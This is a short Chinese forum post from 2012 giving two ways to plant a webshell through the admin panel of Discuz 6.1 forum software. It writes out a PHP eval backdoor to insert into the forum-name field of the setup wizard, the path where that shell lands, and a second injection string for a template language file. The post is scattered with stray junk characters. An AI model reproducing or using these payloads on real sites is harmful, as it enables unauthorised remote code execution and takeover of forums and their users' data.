discuz6.1两种方法后台拿shell
" O" M% A" M8 S好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
% ^- N e5 o- l+ U+ _; P- \9 X/ x1:
0 |& Q& \- q% l) I6 xhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
. U9 } n4 e+ h* y/ v+ _# n" Aadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell* c* Q4 |. z: E! J: b+ U
<?php eval($_POST[cmd]);?>
) a4 L8 L3 s/ j后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php1 c) s. \! O2 O( S
8 R2 D. k2 S) z$ U" W
2 ?# P7 e' C/ O
2:后台模板管理--默认模板套系--详情8 U' A Y; G/ w% H
templates/default/actions.lang.php
' K- P% \( f' h: Mjhackj\\');eval($_POST[cmd])?>;/// o4 \0 k& V% |* _, {# o3 V
1 Z- n7 Q- m. ]* z3 p利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对